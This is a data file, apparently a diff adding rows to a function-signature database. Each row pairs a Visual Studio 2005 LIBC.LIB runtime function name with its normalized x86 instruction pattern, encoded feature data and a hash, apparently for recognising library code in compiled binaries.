+__ftelli64,"SUB R32,R32\nADD R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nSHL CONST2,CONST",IYd5Y3XcJ9ly6DpFcug6RXXcJ9mc7n8wnO5/MHG1TUjG9xEo0kQiKkazKqIuVbn+xvcRKEL41tYAAAAALlW5/gTQxLWvsJ+G7o/vaEFF0Btb0BXgr7CfhkazKqIAAAAAW9AV4NchGdFBRdAbcbVNSFvQFeA8zmEiBNDEtZVP4mIEnqI0QUXQG9chGdEAAAAA1yEZ0SGHeWMAAAAAIYd5Y5VP4mJBRdAbQUXQG5VP4mIAAAAAlU/iYkazKqIAAAAAPM5hIoOuQ14m7uFlRrMqokL41tYAAAAABJ6iNFjM1mvfE8DlJu7hZXLoOkUAAAAAFPMh4OZvjmooXb+rQvjW1gAAAAAAAAAAcug6RYOuQ14UxIhqFMSIauj+gdBBRdAbQUXQG+j+gdAAAAAA3xPA5VjM1muEx9tY6P6B0HLoOkUAAAAAW9AV4N8TwOWD8oEZhMfbWHLoOkUAAAAAg/KBGXXcJ9kAAAAAKF2/q+ZvjmoAAAAAcug6RVgrj1YUxIhq5m+OapzufzAhh3ljFMSIauj+gdBBRdAbddwn2UL41tYAAAAAQUXQG+j+gdAAAAAA6P6B0HLoOkUAAAAAWCuPViGHeWMAAAAAg65DXtJEIio6xLKO3xPA5dJEIio6xLKOWMzWa0FF0Bvuj+9oOsSyjkL41tYAAAAA,[],98fd91ba46f79e8a727b10150d02d85c3e290d72,VS2005,LIBC.LIB
+__wsopen,"OR BYTE PTR SS:[EBP+CONST],CONST\nPUSH CONST\nMOV R32,R32\nPOP R32\nAND R32,R32\nSUB R32,R32\nJCC CONST",ZnkxNUL41tYAAAAAu7ZcLPQp7gi7tlwsl9p7lPQp7giwDNdDWNooOvQp7gitkX8CW9AV4NjNBKZOd4J8sAzXQ8SSpmgAAAAAu7ZcLLAM10PEBW6yu7ZcLLu2XCxYK49WTneCfNjNBKYn/tJ+2M0EptjNBKYn/tJ+4KVNZycPdRLYzQSmNRZyE7AM10MAAAAAJ/7SftMM6c4AAAAAz+tiHOZdOmTiyiL0u7ZcLLk6FFngpU1n2M0EptMM6c60bjPq9CnuCOcL35cAAAAAuToUWScPdRLYzQSmIYd5Y8QFbrJy6DpF9CnuCNsHce8AAAAA0wzpzouZ/5z1t4FRtG4z6ouZ/5z1t4FR9CnuCNsHce8AAAAA5l06ZCcPdRJXpvvURD6c1BYJ39g1oZ2y9CnuCNsHce8AAAAATn6CqoEvqNG7tlwsWNooOt+CnwdY2ig69beBUWZ5MTUAAAAA4soi9Fem+9TmXTpkKxOjwlvQFeCmrZQNWNooOvQp7ghy6DpFV6b71EL41tYAAAAAu7ZcLPQp7gi7tlwscug6Rd+Cnwc1FnITxJKmaEL41tYAAAAAxAVustsHce8AAAAAi5n/nP4frUFAZ//urZF/ArAM10P0Ke4IJw91Eibu4WUnD3USNaGdsrTftAoAAAAAQGf/7ru2XCwSf6hiWCuPVrk6FFkAAAAAxAVusvs/q2oAAAAAJw91Eibu4WXNdHpq2M0EpicPdRInD3USFgnf2FQwF2Jb0BXg34KfB9jNBKbAfTo9zXR6akL41tYAAAAA9CnuCOcL35cAAAAAsnoJ1buo1cVmgpy72wdx79jNBKbAfTo99CnuCPs/q2oAAAAAl9p7lPQp7giX2nuUtN+0ClQwF2Jb0BXg9CnuCPs/q2oAAAAAJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAAgS+o0VjaKDohh3ljwH06PdjNBKYrE6PC+z+raljaKDohh3ljFaIxVlQwF2Juu82i5wvfl4EvqNG7tlwsZoKcuycPdRJeo4MnEn+oYkL41tYAAAAAbrvNok5+gqqX2nuU/h+tQUL41tYAAAAAVDAXYk5+gqqX2nuU2M0EplvQFeCmrZQNXqODJ1em+9QAAAAAu6jVxeZdOmTP62Icpq2UDdjNBKZOd4J8cug6RcQFbrJy6DpFJw91EicPdRKyegnVW9AV4G67zaIVojFWcug6RfQp7ghY2ig6,[],219cb048f4a42b3e69fa8d2b7fe5ef6d452dc94a,VS2005,LIBC.LIB
+__wopen,"PUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",8qdmRQAAAAAAAAAA,V6b71EL41tYAAAAANaGdsrTftAoAAAAAu7ZcLPQp7gi7tlwsW9AV4G67zaIVojFWcug6Rd+Cnwc1FnITxJKmaEL41tYAAAAAi5n/nPbMFSFAZ//uIYd5Y8QFbrJy6DpFJw91Eibu4WUnD3US+z+raljaKDohh3lj9CnuCNsHce8AAAAAtG4z6ouZ/5z1t4FRxAVusvs/q2oAAAAAJw91Eibu4WWq8S9Y2M0EpicPdRInD3USJw91EicPdRKyegnVFgnf2FQwF2Jb0BXg34KfB9jNBKbAfTo9qvEvWCbu4WUAAAAA9CnuCNsHce8AAAAA4KVNZycPdRLYzQSmsnoJ1buo1cVmgpy72wdx79jNBKbAfTo99CnuCPs/q2oAAAAA9CnuCPs/q2oAAAAA9CnuCNsHce8AAAAAJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAAgS+o0VjaKDohh3ljwH06PdjNBKYrE6PCxAVustsHce8AAAAAl9p7lPQp7giX2nuUZoKcuycPdRJeo4MnbzgW/2Z5MTUAAAAAu7ZcLPQp7gi7tlwsbrvNok5+gqqX2nuU9swVIWZ5MTUAAAAAVDAXYk5+gqqX2nuU2M0EplvQFeCmrZQNXqODJ1em+9QAAAAA4soi9Fem+9TmXTpku6jVxeZdOmTP62Icpq2UDdjNBKZOd4J8cug6RcQFbrJy6DpFcug6RfQp7ghY2ig6ZnkxNUL41tYAAAAAl9p7lPQp7giwDNdDWNooOvQp7gitkX8CW9AV4NjNBKZOd4J8sAzXQ8SSpmgAAAAAu7ZcLLu2XCxYK49WTneCfNjNBKYn/tJ+NRZyE7AM10MAAAAA2M0EptjNBKYn/tJ+WCuPVrk6FFkAAAAAJ/7SftMM6c4AAAAAz+tiHOZdOmTiyiL0u7ZcLLk6FFngpU1n2M0EptMM6c60bjPq9CnuCOcL35cAAAAAuToUWScPdRLYzQSmtN+0ClQwF2Jb0BXgKxOjwlvQFeCmrZQN0wzpzouZ/5z1t4FR9CnuCOcL35cAAAAA5l06ZCcPdRJXpvvURD6c1BYJ39g1oZ2yFaIxVlQwF2Juu82iTn6CqoEvqNG7tlwsu7ZcLLAM10PEBW6yWNooOt+CnwdY2ig69beBUWZ5MTUAAAAArZF/ArAM10P0Ke4I5wvfl4EvqNG7tlwsQGf/7ru2XCxvOBb/WNooOvQp7ghy6DpF,05682489b3cb1e8254692e2850abe4e6d7799c8d,VS2005,LIBC.LIB
+__mbsspnp,"PUSH DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nADD R32,R32\nPOP R32\nMOV R8,BYTE PTR DS:[R32]",9Yg8RydGqp6djqlw2KWjaidGqp6djqlwreMUpSdGqp4J809qnY6pcOXrG2jl6xtoDczAAa8h//QAAAAAryH/9Nilo2pNcwQhpqbJzJAapG5XYDFh5esbaCdGqp6vIf/0TXMEIT/DesUAAAAAryH/9J2OqXAnRqqeryH/9E1zBCGvIf/0kBqkbk1zBCH1iDxH5esbaAnzT2qt4xSlJ0aqnk1zBCHlsZZOV2AxYT/DesUAAAAAP8N6xQAAAAAAAAAA5bGWTq8h//SvIf/0CfNPaidGqp4NzMAB,[],938cfbcf1d611336b9bf5ceff65836ebc20d6e65,VS2005,LIBC.LIB
+__strnset,"MOV R32,R32\nPOP R32\nPOP R32\nLEAVE\nRETN",UagaLMjPaIq6bUIPfSz+4cjPaIoAAAAAyM9oigAAAAAAAAAAum1CD30s/uGHR1I/h0dSP30s/uEAAAAA,[],d8584842c3b9d98f36fcd9fb8a82786b86e339f2,VS2005,LIBC.LIB
+__memccpy,"MOV R8,BYTE PTR SS:[ESP+CONST]\nPUSH R32\nTEST R32,CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",nsCxHj/DesW7tlwsl9p7lC+iRdU6XiaGdqzq7D/DesWX2nuUAcDPEE+LzAqej6tgu7ZcLDpeJoYvokXVL6JF1QAAAAAAAAAAT4vMCgAAAAAAAAAAOl4mhk6YB5mewLEeTpgHmQAAAAAAAAAAP8N6xQAAAAAAAAAAno+rYDpeJoZ2rOrs,[],fe8958a4e89688a7ee247bffb1c62c1568e49e10,VS2005,LIBC.LIB
+__putenv,"LEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nMOV EBP,R32\nPOP R32\nTEST EBP,EBP\nJCC CONST",AJxOB8SSpmjdOYBv5f6OiMSSpmgGgcpPbkCJwMSSpmgVojFWxJKmaKqT3bIAAAAAQ8WMksSSpmg1eAEyJu7hZaqT3bIAAAAA3TmAb8SSpmhuQInAqpPdsgAAAAAAAAAANXgBMibu4WXEkqZoBoHKT8SSpmhDxYySFaIxVibu4WXl/o6I,[],7096f9759df7b003c4c74adb08ef1dc3e573c1ca,VS2005,LIBC.LIB
+__ismbcspace,"AND WORD PTR SS:[EBP+CONST],0\nPUSH R32\nXOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSTOS WORD PTR ES:[R32]\nMOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST",a0R6qK3k4gms37PmrN+z5gAAAAAAAAAAreTiCazfs+bP62IcFHVKWQAAAAAAAAAAz+tiHKzfs+YnD3US3WlkKSQDw51rRHqosSEAqQAAAAAAAAAAybuSWAAAAAAAAAAAJw91Eqzfs+bJu5JYJAPDnbEhAKkUdUpZ,[],12afd5f9e43f0bed0e2eb1334a971300e7ee8a6b,VS2005,LIBC.LIB
+__mbscspn,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nXOR R32,R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",2c0RvAAAAAAAAAAAryH/9J2OqXAnRqqeMs+GYAAAAAAAAAAAkhlQFjLPhmBNRR9lJ0aqntnNEbzlsZZOCfNPaidGqp4NzMABWhZ4JJIZUBajhXV2reMUpSdGqp4J809q5bGWTq8h//SvIf/0TUUfZSdGqp6djqlwP8N6xQAAAAAAAAAA2KWjaidGqp6djqlwryH/9NnNEbyvIf/0nY6pcOXrG2jl6xtoDczAAa8h//QAAAAAryH/9Nilo2rZzRG85esbaCdGqp6vIf/0o4V1dj/DesUAAAAA5esbaAnzT2qt4xSl,[],72d959e2415b043d41e74533f20d7bd40c9f3560,VS2005,LIBC.LIB
+__wputenv,"PUSH R32\nCALL CONST\nCMP R32,R32\nPOP R32\nMOV DWORD PTR SS:[ESP+CONST],R32\nJCC CONST",x6kDXwAAAAAAAAAAqpPdsgAAAAAAAAAAxglD6sSSpmjogux7357u98SSpmjjAaoN6ILse8epA1/EkqZoFaIxVsepA1/NwxNqu18Q8MSSpmjGCUPqzcMTasSSpmi7XxDwbkCJwMSSpmgVojFW4wGqDcSSpmhuQInAxJKmaKqT3bIAAAAA,[],4c9c29a622ccb00aed7b458b8ce2dae22efe31de,VS2005,LIBC.LIB
+__snwprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32\nDEC DWORD PTR SS:[EBP+CONST]\nJCC CONST",653N1wAAAAAAAAAA3xPA5f4HNh43XfGVN13xleudzdcAAAAAdshji98TwOUAAAAA/gc2HuudzdcAAAAAxsELZqHx2Tl2yGOLofHZOf4HNh43XfGV,[],1a952b8efae98a7eeea8993ef3d38c1f6f439ac3,VS2005,LIBC.LIB
+__stati64,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,R32",QvjW1gAAAAAAAAAAKpqxS5GiMxMAAAAA1XWwgJw3sKTyoP4qJrKnd0L41tYAAAAAYepA85w3sKQkP6zuDnayq5w3sKQkP6zukaIzE0L41tYAAAAA0LhLTZw3sKTyoP4q8qD+Kpw3sKSgNzqhoDc6oSayp3cAAAAAJD+s7uiZVTrQxMhtnDewpA49NxQtjqF80MTIbeiZVToFa6+3IcjSeMj7wuaxtfPI8qD+KtC4S02cN7CknDewpA49NxQtjqF86JlVOibu4WUAAAAABWuvt4k5mYeIXCPrLY6hfA49NxTzjRv0sbXzyGHqQPOP4s79nDewpA49NxQtjqF8LY6hfA49NxQzjAqGj+LO/fuOkaWW7PjP840b9EL41tYAAAAAluz4z/uOkaXI+8LmDj03FCbu4WUAAAAAyPvC5kL41tYAAAAAiFwj6+iZVTqJOZmHLY6hfA49NxTVdbCAM4wKhpw3sKTyoP4q+46RpQ52sqsAAAAAiTmZh+iZVToqmrFLJu7hZUL41tYAAAAA,[],5e7ed02d2fd6e4f20bba3360907ff18aee1bece4,VS2005,LIBC.LIB
+__mbsnicoll,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",T4vMCgAAAAAAAAAAtxC8asK8QFYxeEJwcMiU5LcQvGpPi8wKMXhCcAAAAAAAAAAAwrxAVgAAAAAAAAAA,[],2223560bd5ed8a613d23b0a484af6b04636b5b3f,VS2005,LIBC.LIB
+_rewind,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nCALL CONST\nAND DWORD PTR DS:[R32+CONST],CONST\nCMP R32,-1",LU2vfH9aqkqQGs5svlT/9X9aqkqQGs5sSOSnmb5U//UAAAAAkBrObH9aqkoAAAAAj43iny1Nr3xI5KeZf1qqSgAAAAAAAAAA,[],05dc128fa157f79675d3a39df3bec60565523bec,VS2005,LIBC.LIB
+__chsize,"PUSH CONST\nPUSH R32\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,-1\nMOV DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",/KnbVwAAAAAAAAAA5FK8n/ZCTkxeo4Mn+RtZI4RCe/68prt0XqODJ7TftAoAAAAAJAPDnf2xXveGTHauLokCbgAAAAAAAAAAhkx2rvs6FjoAAAAA/bFe9/s6FjoAAAAAvKa7dIRCe/5Xy9//9kJOTPs6FjoAAAAAIYd5Y/s6FjriAl0e4gJdHvs6FjoqyQo9V8vf/yGHeWP+WsWb/lrFm62jL6WEFxD9I098kfyp21fJhTYaKskKPS6JAm4AAAAAtN+0Cq2jL6WEFxD9hEJ7/gAAAAAAAAAAhBcQ/SQDw53kUryfyYU2Gvyp21f5G1kjraMvpSQDw53kUryf+zoWOi6JAm4AAAAA,[],d6abe87294e8ed7fcb120e74521a2856b7c8565b,VS2005,LIBC.LIB
+__wrmdir,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",+RqFzSbu4WWVUBzMUs42lQAAAAAAAAAAlVAczHLoOkUAAAAAJu7hZXLoOkUAAAAAcug6RVLONpUIpA1ACKQNQAAAAAAAAAAA,[],5342bcfe27c9488772dba5d0e1e5a00815fbb890,VS2005,LIBC.LIB
+_wcsncat,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nDEC R32\nMOV R32,R32\nDEC R32\nDEC R32\nTEST R32,R32\nPUSH R32",iQjxXx2cRa6FBAvC/NQrLcNMSgodnEWuHZxFrj/DesUAAAAAP8N6xQAAAAAAAAAAhQQLwsNMSgoAAAAAm+/JPtgUC7gAAAAAw0xKCj/DesX81Cst2BQLuNgUC7iJCPFf,[],dcd073d4667556c827c6f4fbf990c0ea513f3382,VS2005,LIBC.LIB
+___getlocaleinfo,"PUSH R32\nCALL CONST\nPOP R32\nCMP R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nJCC CONST",c4cY/OCNJQ+54J6Q6Kk2Crmb7qoPKchtCfr8xuCNJQ+54J6QueCekHLoOkUAAAAAj60KKpyGUTikt6qL4I0lD2Z5MTUs4zPXDynIbdIADXu7IZT2pLeqiw8pyG0C6H/0cug6RWZ5MTUs4zPXuyGU9iSjmVy5m+6qLOMz1wn6/MZmeTE1uZvuqiSjmVwAAAAAJKOZXEL41tYAAAAAQvjW1gAAAAAAAAAA0gANe2Z5MTU9ZCFoZnkxNUL41tYAAAAAAuh/9CSjmVwRdW2WPWQhaGZ5MTUAAAAAnIZROCSjmVyzqVaYEXVtliSjmVwWXTr5s6lWmCSjmVxzhxj8Fl06+SSjmVzoqTYK,[],05648c10053c3dc65bf12a00e9ec9b7c28e0f524,VS2005,LIBC.LIB
+_wcscmp,"INC R32\nINC R32\nINC R32\nINC R32\nMOV R16,WORD PTR DS:[R32]\nJMP SHORT CONST",jPjVeGYEDRdQnB2kUJwdpKVdwWkAAAAArFKSEKVdwWkAAAAAZgQNFyGHeWObkFD8m5BQ/AAAAAAAAAAApV3BaWYEDReM+NV4IYd5YwGhdbNYWXafWFl2nwGhdbMAAAAAAaF1swAAAAAAAAAA,[],6ae5ca7f6ebb0f6a0069c6eb915e07e34cb24ad3,VS2005,LIBC.LIB
+___setargv,"PUSH CONST\nCALL CONST\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",nOZh+7cFiohBDPKunMqM5jplNTyKzu3tOmU1PAAAAAAAAAAAis7t7QAAAAAAAAAAKckqrjplNTyKzu3tQQzyruee1pNv0KYLtwWKiOee1pNv0KYLb9CmCynJKq6cyozm557WkynJKq6cyozm,[],a704e6bd5c7601997a40c80673b832d3dcb82caf,VS2005,LIBC.LIB
+__CItan,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,6c52c281985b6103670d322a91d32196ce78ce3a,VS2005,LIBC.LIB
+_tan,FLD TBYTE PTR DS:[0]\nFXCH ST(1)\nFPREM1\nWAIT\nFSTSW R16\nSAHF\nJCC CONST,N9QtU9FIlKUAAAAALLApNwVtZtAR3zjE0UiUpXtGESB7RhEgAFkkeehVq9qc7n8winytBQVtZtAAAAAA6FWr2jfULVPNLBGmBW1m0CywKTeC5sMaEd84xIp8rQWKfK0F0UiUpYp8rQWKfK0FzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAALLApNyywKTeC5sManO5/MCywKTeP65fekOKhEXtGESB7RhEggubDGtFIlKUAAAAAj+uX3gVtZtAR3zjE,[],16d36899b4e207d1914d8618223ed54205368aa8,VS2005,LIBC.LIB
+_frexp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nOR DWORD PTR DS:[R32],CONST\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nPOP R32",8Ad/BaC1AHUAAAAAu7ZcLPAHfwW7tlwsqslib8r4HjFArlqXu7ZcLNF6PueJmH8wQK5al9F6Pue7tlws0Xo+5zlafGAAAAAAiZh/MDlafGAAAAAAOVp8YAAAAAAAAAAAoLUAdTlafGAAAAAAyvgeMTlafGAAAAAA,[],6a18af954cc00a5fb90cc7f1fd0aa06673eddab6,VS2005,LIBC.LIB
+__wspawnvpe,"PUSH R32\nCALL CONST\nLEA R32,DWORD PTR DS:[R32+R32*2+CONST]\nPOP R32\nMOV R16,WORD PTR DS:[R32]\nCMP R16,CONST\nJCC CONST",zQZvFkYMn8DRSJSl6jKEuFTdXBkgl7OaeqPGNVTdXBkcEzbTIJezmnqjxjUAAAAA0UiUpUYMn8BPN/JMKs8cOUYMn8Aqzxw57ryWWxazdMLqMoS46jKEuBHs5BOns1c7p7NXO1TdXBkAZGJLHBM201TdXBmJp02zVN1cGQAAAAAAAAAAiadNsxHs5BPqMoS4IH9A81TdXBkcEzbTTzfyTEYMn8Aqzxw5FrN0wiCXs5rqMoS4RgyfwAAAAAAAAAAAAGRiS1TdXBkkA8Od6jKEuFTdXBkWs3TCKs8cOUYMn8Agf0DzJAPDnSCXs5ruvJZbEezkE1TdXBkAZGJL,[],45242e9a26df96d680e815035309db1da7d2eee4,VS2005,LIBC.LIB
+__getpath,"AND BYTE PTR DS:[R32],0\nSUB R32,R32\nNEG R32\nSBB R32,R32\nPOP R32\nAND R32,R32\nPOP EBP\nRETN",6P6B0BTEiGoAAAAADczAAdQAzQMAAAAAQUXQG9QAzQMAAAAA1ADNAwAAAAAAAAAATC/5RRTEiGoAAAAAFMSIauGPNi3o/oHQ6P6B0BTEiGoAAAAA4Y82LUFF0Bt1RrPRdUaz0RTEiGpb0BXgW9AV4BTEiGpb0BXgW9AV4IdHUj9mUe9NZlHvTQ3MwAFeo4MnXqODJ4/izv0AAAAAh0dSP4/izv0AAAAAj+LO/RTEiGpb0BXgW9AV4BTEiGpmUe9NZlHvTQ3MwAFeo4MnXqODJ4/izv0AAAAAFMSIao/izv0WkTl6FpE5elvQFeAUxIhqj+LO/VvQFeAUxIhqFMSIatQAzQPo/oHQ,[],f3cf052682d3d354d2fd7bd5f30cd3af762b5c02,VS2005,LIBC.LIB
+__CIlog10,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,9a6bfc6ccf2cdc17e3b0d328a8c54c666c653509,VS2005,LIBC.LIB
+_log10,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nJCC CONST",N9QtU9FIlKUAAAAA0UiUpZ8T3I+fE9yPzSwRpjfULVPoVava2OAoGehVq9roVava6FWr2kLuo1HNLBGmAFkkeehVq9r4Pk1X6FWr2tFIlKVWICeY6FWr2uhVq9roVavas5MgDOhVq9oAAAAAzSwRpkLuo1GQ4qERnxPcjwAAAAAAAAAAViAnmNFIlKUAAAAA6FWr2lYgJ5hC7qNRkOKhEZ8T3I+fE9yPQu6jUbOTIAyzkyAM+D5NV+hVq9rY4CgZ6FWr2jfULVPNLBGm0UiUpbOTIAyzkyAM,[],09996909c33bbf81fbf88b6c1618cf1fff9f295b,VS2005,LIBC.LIB
+__wcsnicoll,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP",CXYH8EupfWBPi8wK0os9zwAAAAAAAAAAAaF1swAAAAAAAAAAP9Bkq8K8QFbSiz3PT4vMCgAAAAAAAAAAS6l9YD/QZKuwlLLIsJSyyAGhdbMAAAAAwrxAVgAAAAAAAAAA,[],1000835206d03127bc7298302ea91e8084cb6f7d,VS2005,LIBC.LIB
+_strstr,"PUSH R32\nMOV R32,R32\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST CONST2,CONST\nJCC CONST",6FWr2p4JE7/oVavajmkbnGHqmGleo4Mn6FWr2ipT1X9Y2ig6Nj1VBAAAAAAAAAAAt0SdVFylOYnYzQSmWNooOp4JE78qU9V/XqODJ7dEnVQAAAAAMuCzKj8wW5QAAAAA2LA4hD8wW5QAAAAAKlPVfwAAAAAAAAAAJguIGAAAAAAAAAAAhHCHHTY9VQTYzQSm2M0EplylOYkqU9V/2M0EpipT1X/YzQSmIBY5ggAAAAAAAAAA2M0EpjY9VQTYzQSmkK1LnSAWOYJh6php2M0EpipT1X/LaBJKy2gSSjY9VQTYzQSm2M0EpipT1X/YzQSm2M0Epmvi4WrYzQSmYeqYaTLgsyq3RJ1UXKU5idiwOITYzQSm2M0EpipT1X9eo4MnXqODJ54JE78AAAAA2M0EpiYLiBhY2ig6a+LhagAAAAAAAAAAWNooOlylOYl2m1RmNj1VBAAAAAAAAAAAdptUZp4JE78AAAAANj1VBAAAAAAAAAAAXKU5iVylOYnYzQSm2M0EplylOYnYzQSmNj1VBAAAAAAAAAAAngkTv4Rwhx3oVava2M0EpipT1X9cpTmJKlPVfwAAAAAAAAAAXKU5idjNBKYRWXGHEVlxhzY9VQQ6XiaGYeqYaTY9VQQ6XiaGOl4mhrdEnVRh6phpPzBblHabVGZcpTmJYeqYaTY9VQSOaRuc,[],0ac291bb83dea7efce0e7866eedbc054f696a62d,VS2005,LIBC.LIB
+_gets,"PUSH CONST\nCALL CONST\nPOP R32\nCMP R32,CONST\nJCC CONST",DczAAdV/HhwAAAAAaMH6wLLL54q7tlwsssvnigAAAAAAAAAAmrh2pbu2XCwAAAAAu7ZcLHLoOkVCsxj/W9dWdmjB+sCauHalu7ZcLLLL54q7tlws1X8eHAAAAAAAAAAAJ9PGTWjB+sCauHalQrMY/1vXVnYAAAAAcug6RbLL54oNzMAB,[],cfc664968b0ef86e2d61ce250a2034de7076a33d,VS2005,LIBC.LIB
+__mbsrchr,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",pDsJgjR1oGBC8G1l89SH4Chdv6vokgSTEWQzg62TDUUAAAAADczAASGHeWMAAAAAQvBtZQAAAAAAAAAAKF2/qyGHeWMAAAAA6JIEkw3MwAG+WoYjIYd5Y62TDUUm7uFlJu7hZa2TDUUAAAAArZMNRfPUh+A5WnxgOVp8YAAAAAAAAAAAvlqGI62TDUURZDODNHWgYPPUh+AAAAAA,[],96adc5e2c1e4bc65d640ed32fac7a596422cb666,VS2005,LIBC.LIB
+___initconout,"XOR R32,R32\nPUSH R32\nPUSH R32\nPUSH CONST\nPUSH R32\nPUSH CONST\nPUSH CONST\nPUSH CONST",rFu1pQAAAAAAAAAA,[],64738f2235360cab6b7358a0ae173d9b5407f3dd,VS2005,LIBC.LIB
+___initconin,"XOR R32,R32\nPUSH R32\nPUSH R32\nPUSH CONST\nPUSH R32\nPUSH CONST\nPUSH CONST\nPUSH CONST",rFu1pQAAAAAAAAAA,[],21a995573f17e81ba03f5f62436ff4e5e0eff94a,VS2005,LIBC.LIB
+___termcon,"PUSH R32\nCALL R32\nMOV R32,DWORD PTR DS:[0]\nCMP R32,-1\nJCC CONST",u7ZcLIL3Gwn70VQ2+9FUNgDh1mu7tlwsgvcbCQDh1mu7tlwsYPXRqYL3Gwm7tlwsu7ZcLADh1mvxHjOl8R4zpQDh1msAAAAAAOHWawAAAAAAAAAA,[],022f16bdfb13ad8eff1bcdb8898b219c27f22f9b,VS2005,LIBC.LIB
+__ftol,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-0C\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nWAIT\nMOV R16,WORD PTR SS:[EBP+CONST]\nOR R8,CONST",FHMPFAAAAAAAAAAA,[],cf99dbeced12f842a0bb6cc431da936d5ba007a1,VS2005,LIBC.LIB
+__getmbcp,"MOV R32,DWORD PTR DS:[0]\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR DS:[0]\nRETN",3A9qSAAAAAAAAAAA,[],0a47821b49e2f5017edb6906516c440655f02f0b,VS2005,LIBC.LIB
+___initmbctable,"PUSH -3\nCALL CONST\nPOP R32\nMOV DWORD PTR DS:[0],CONST\nRETN",AaF1swAAAAAAAAAAJAPDnQGhdbP2D0i69g9IugAAAAAAAAAA,[],2195281448d05f92153363f4a9a5748fed9401d9,VS2005,LIBC.LIB
+__setmbcp,"PUSH CONST\nXOR R32,R32\nPOP R32\nMOV R32,0\nREP STOS DWORD PTR ES:[R32]\nLEA R32,DWORD PTR DS:[R32+R32*2]\nMOV DWORD PTR SS:[EBP+CONST],R32\nSHL R32,CONST",v4dt3oejbX0AAAAAERnrp8GM7u8HrhYQNsqmV5DRYF1h6phpB64WEDbKplcaAtwlPmncTnqpmcVYWXafOvuA1DbKplcaAtwlGgLcJTr7gNQNGj48WFl2n1GoKroAAAAAUagqulGoKrrq0+3sDRo+PBWiMVZ5Fk7yy8+mipDRYF1h6php7DS4ioejbX0AAAAAYeqYaZDRYF2nOXpT6tPt7PtZUUEAAAAApzl6U/jpdg5GjVHXeRZO8rod2zvSRCIqRo1R13d45OT46XYOd3jk5Hd45OT46XYOuh3bO/tZUUEAAAAA+1lRQS1MEB8AAAAA+Ol2DmHqmGmQ0WBdkNFgXcvPpooQEjBU0kQiKlhZdp/3Zl4vFaIxViSjmVzBjO7vQD1IRA3MwAERGeunwYzu7y1MEB8AAAAA92ZeL3qpmcUAAAAAEBIwVC1MEB8AAAAAeqmZxVhZdp/sNLiKLUwQH0L41tYAAAAADczAAUL41tYAAAAAJKOZXEL41tYAAAAAQvjW1gAAAAAAAAAAh6NtfT5p3E6/h23e,[],17d130d22f6eeaef111dab685d4a9bcbafe52ae0,VS2005,LIBC.LIB
+__cputs,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nXOR R32,R32\nCMP DWORD PTR DS:[0],-2\nJCC CONST",jaBAauudzdcko5lciPGXViQDw50EgxOD653N1wAAAAAAAAAAJKOZXOudzdcAAAAABIMTgySjmVyNoEBqJAPDnSSjmVyNoEBq,[],abbd76ed9734c6ed8bee2a99c570327cf4354e08,VS2005,LIBC.LIB
